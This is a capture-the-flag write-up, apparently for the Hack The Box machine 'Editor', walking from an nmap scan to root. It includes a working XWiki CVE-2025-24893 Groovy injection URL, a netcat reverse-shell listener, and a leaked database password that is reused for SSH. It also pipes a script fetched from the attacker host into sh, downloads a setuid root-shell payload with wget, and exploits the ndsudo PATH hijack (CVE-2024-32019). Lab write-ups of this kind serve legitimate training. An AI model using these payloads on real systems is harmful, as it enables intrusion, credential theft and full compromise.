Editor - CSPSec

![[Editor.png]] # **Nmap Results** ```bash # Replace <target_ip> and <target_domain> echo -e "\ntarget_ip=10.129.30.58\ntarget_domain=editor.htb" | tee -a ~/.bashrc exec bash echo "$target_ip $target_domain" | sudo tee -a /etc/hosts mkdir -p ~/my_data/$target_domain/nmap && cd ~/my_data/$target_domain # Scan all TCP ports sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip -vvv # Scan top 1000 UDP ports sudo nmap -sU -oA nmap/initial.udp $target_ip -vvv # Scan top 100 UDP ports using a faster timing template sudo nmap -sU -oA nmap/initial.udp -T4 -F $target_ip -vvv ``` ```text # Nmap 7.94SVN scan initiated Wed Oct 29 13:46:33 2025 as: nmap -sC -sV -oA nmap/full.tcp -p- -vvv 10.129.30.58 Nmap scan report for 10.129.30.58 Host is up, received echo-reply ttl 63 (0.0088s latency). Scanned at 2025-10-29 13:46:33 CDT for 23s Not shown: 64561 closed tcp ports (reset), 971 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc= | 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) | http-methods: |_ Supported Methods: GET POST OPTIONS |_http-title: Did not follow redirect to http://editor.htb/ 8080/tcp open http syn-ack ttl 63 Jetty 10.0.20 | http-webdav-scan: | WebDAV type: Unknown | Server Type: Jetty(10.0.20) |_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK | http-cookie-flags: | /: | JSESSIONID: |_ httponly flag not set | http-methods: | Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK |_ Potentially risky methods: PROPFIND LOCK UNLOCK |_http-open-proxy: Proxy might be redirecting requests | http-robots.txt: 50 disallowed entries (40 shown) | /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ | /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ | /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ | /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ | /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ | /xwiki/bin/undelete/ /xwiki/bin/reset/ /xwiki/bin/register/ | /xwiki/bin/propupdate/ /xwiki/bin/propadd/ /xwiki/bin/propdisable/ | /xwiki/bin/propenable/ /xwiki/bin/propdelete/ /xwiki/bin/objectadd/ | /xwiki/bin/commentadd/ /xwiki/bin/commentsave/ /xwiki/bin/objectsync/ | /xwiki/bin/objectremove/ /xwiki/bin/attach/ /xwiki/bin/upload/ | /xwiki/bin/temp/ /xwiki/bin/downloadrev/ /xwiki/bin/dot/ | /xwiki/bin/delattachment/ /xwiki/bin/skin/ /xwiki/bin/jsx/ /xwiki/bin/ssx/ | /xwiki/bin/login/ /xwiki/bin/loginsubmit/ /xwiki/bin/loginerror/ |_/xwiki/bin/logout/ |_http-server-header: Jetty(10.0.20) | http-title: XWiki - Main - Intro |_Requested resource was http://10.129.30.58:8080/xwiki/bin/view/Main/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Oct 29 13:46:56 2025 -- 1 IP address (1 host up) scanned in 23.41 seconds ``` # **Service Enumeration** ## **TCP/80** ### **Crawling the Website** Manual enumeration of the website revealed a subdomain of interest, `wiki.editor.htb`. After adding it to `/etc/hosts`, I was able to access a Wiki. At the bottom of the page was software and version information (`XWiki 15.10.8`). Researching this particular version of Xwiki led to the discovery of CVE-2025-24893. Exploiting this vulnerability allows an unauthenticated user to execute code remotely. ![[Editor - Manual Enumeration.png]] ![[Editor - Xwiki.png]] # **Exploit** ## **CVE-2025-24893** There is a public POC on Github that is hardcoded to retrieve the contents of `/etc/passwd`. The script's output provides the URL used for RCE. Using Burp Suite, it is possible to modify the request and obtain a reverse shell. ```bash # Initial request to read /etc/passwd http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d ``` ![[Editor - Testing RCE.png]] Set up a listener on the op station and send the request. ```bash nc -lvnp 58951 ``` ![[Editor - Reverse Shell.png]] ## **XWiki Configuration Files** There are a handful of configuration files associated with XWiki. Looking at these files, I found a potential password. Thanks to password reuse, I was able to SSH into the target as `oliver`. ```bash find /usr/lib/xwiki $ -name xwiki.properties -o -name xwiki.cfg -o -name hibernate.cfg.xml -o -name logback.xml $ -exec grep password -C 3 {} \; ``` ``` # Contents of hibernate.cfg.xml --> <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&connectionTimeZone=LOCAL&allowPublicKeyRetrieval=true</property> <property name="hibernate.connection.username">xwiki</property> <property name="hibernate.connection.password">theEd1t0rTeam99</property> <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property> <property name="hibernate.dbcp.poolPreparedStatements">true</property> <property name="hibernate.dbcp.maxOpenPreparedStatements">20</property> -- ``` ``` oliver::theEd1t0rTeam99 ``` # **Post-Exploit Enumeration** ## **Operating Environment** > [!tldr]- OS & Kernel >``` oliver@editor:~$ uname -a Linux editor 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux oliver@editor:~$ cat /etc/*elease DISTRIB_ID=Ubuntu DISTRIB_RELEASE=22.04 DISTRIB_CODENAME=jammy DISTRIB_DESCRIPTION="Ubuntu 22.04.5 LTS" PRETTY_NAME="Ubuntu 22.04.5 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.5 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=jammy >``` > [!tldr]- Current User >```bash >oliver@editor:~$ id uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata) oliver@editor:~$ sudo -l [sudo] password for oliver: Sorry, user oliver may not run sudo on editor. >``` ## **Users and Groups** > [!tldr]- Local Users >```bash >oliver@editor:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin pollinate:x:105:1::/var/cache/pollinate:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin syslog:x:107:113::/home/syslog:/usr/sbin/nologin uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin oliver:x:1000:1000:,,,:/home/oliver:/bin/bash _laurel:x:995:995::/var/log/laurel:/bin/false >``` > [!tldr]- Local Groups >```bash >oliver@editor:~$ cat /etc/group root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog,netdata tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13:netdata kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24: floppy:x:25: tape:x:26: sudo:x:27: audio:x:29: dip:x:30: www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46: staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-network:x:102: systemd-resolve:x:103: messagebus:x:104: systemd-timesync:x:105: input:x:106: sgx:x:107: kvm:x:108: render:x:109: lxd:x:110: _ssh:x:111: crontab:x:112: syslog:x:113: uuidd:x:114: tcpdump:x:115: tss:x:116: landscape:x:117: fwupd-refresh:x:118: netdev:x:119: docker:x:120:netdata mysql:x:121: tomcat:x:998: xwiki:x:997: netdata:x:999:oliver oliver:x:1000: _laurel:x:995: oliver@editor:~$ cat /etc/group | grep oliver netdata:x:999:oliver oliver:x:1000: >``` ## **Network Configurations** > [!tldr]- Network Interfaces >```bash >oliver@editor:~$ ip addr >1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 > link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 > inet 127.0.0.1/8 scope host lo > valid_lft forever preferred_lft forever > inet6 ::1/128 scope host > valid_lft forever preferred_lft forever >2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 > link/ether 00:50:56:b0:bc:5a brd ff:ff:ff:ff:ff:ff > altname enp2s0 > altname ens32 > inet 10.129.30.58/16 brd 10.129.255.255 scope global dynamic eth0 > valid_lft 3541sec preferred_lft 3541sec >3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default > link/ether 02:42:57:f0:35:4b brd ff:ff:ff:ff:ff:ff > inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0 > valid_lft forever preferred_lft forever >``` >[!tldr]- Open Ports >```bash >oliver@editor:~$ ss -tanup | grep -i listen tcp LISTEN 0 4096 127.0.0.1:8125 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.1:19999 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.1:40137 0.0.0.0:* tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:* tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 511 [::]:80 [::]:* tcp LISTEN 0 50 *:8080 *:* >``` ## **Interesting Files** > [!tldr]- C:\InterestingDir\Interesting-File1.txt >```bash >oliver@editor:~$ find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null -rwsr-x--- 1 root netdata 965056 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network -rwsr-x--- 1 root netdata 1377624 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin -rwsr-x--- 1 root netdata 1144224 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners -rwsr-x--- 1 root netdata 200576 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo -rwsr-x--- 1 root netdata 81472 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping -rwsr-x--- 1 root netdata 896448 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin -rwsr-x--- 1 root netdata 4261672 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin -rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp -rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd -rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su -rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount -rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh -rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3 -rwsr-xr-x 1 root root 232416 Jun 25 12:48 /usr/bin/sudo -rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd -rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount -rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn -rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 338536 Apr 11 2025 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1 >``` # **Privilege Escalation** ## **CVE-2024-32019** Post-exploit enumeration was automated with Linpeas. ```bash # Ran on the op station mkdir www & cd www wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O l.sh python3 -m http.server 8443 ``` ```bash # Ran on target curl http://10.10.15.9:8443/l.sh | sh ``` Looking at the output, there were unknown SUID binaries. After a bit of research, I discovered `ndsudo` had a known vulnerability, CVE-2024-32019. Exploiting this vulnerability allows for a local privilege escalation. Per the advisory: > The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. > As a user that has permission to run `ndsudo`: > 1. Place an executable with a name that is on `ndsudo`’s list of commands (e.g. `nvme`) in a writable path > 2. Set the `PATH` environment variable so that it contains this path > 3. Run `ndsudo` with a command that will run the aforementioned executable ``` # Linpeas output ╔════════════════════════════════════╗ ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════ ╚════════════════════════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid -rwsr-x--- 1 root netdata 943K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!) -rwsr-x--- 1 root netdata 1.4M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!) -rwsr-x--- 1 root netdata 1.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!) -rwsr-x--- 1 root netdata 196K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!) -rwsr-x--- 1 root netdata 80K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!) -rwsr-x--- 1 root netdata 876K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!) -rwsr-x--- 1 root netdata 4.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!) ``` ```bash # Ran on the op station cat > payload.c << EOF #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/bash", "bash", NULL); return 0; } EOF gcc -static payload.c -o www/nvme -Wall -Werror -Wpedantic ``` ```bash # Ran on target wget http://10.10.15.9:8443/nvme -O /tmp/nvme chmod +x /tmp/nvme PATH=/tmp:$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list ``` # **Flags** > [!tldr]- User > > `97a1d6e6f10b8e7f8ca8c88d29ec78ac` > [!tldr]- Root > > `3e7e5d5864fb1a316a91887390398d83` # **References** - [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893) - [CVE-2025-24893 POC](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py) - [CVE-2024-32019](https://nvd.nist.gov/vuln/detail/CVE-2024-32019) - [CVE-2024-32019 Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)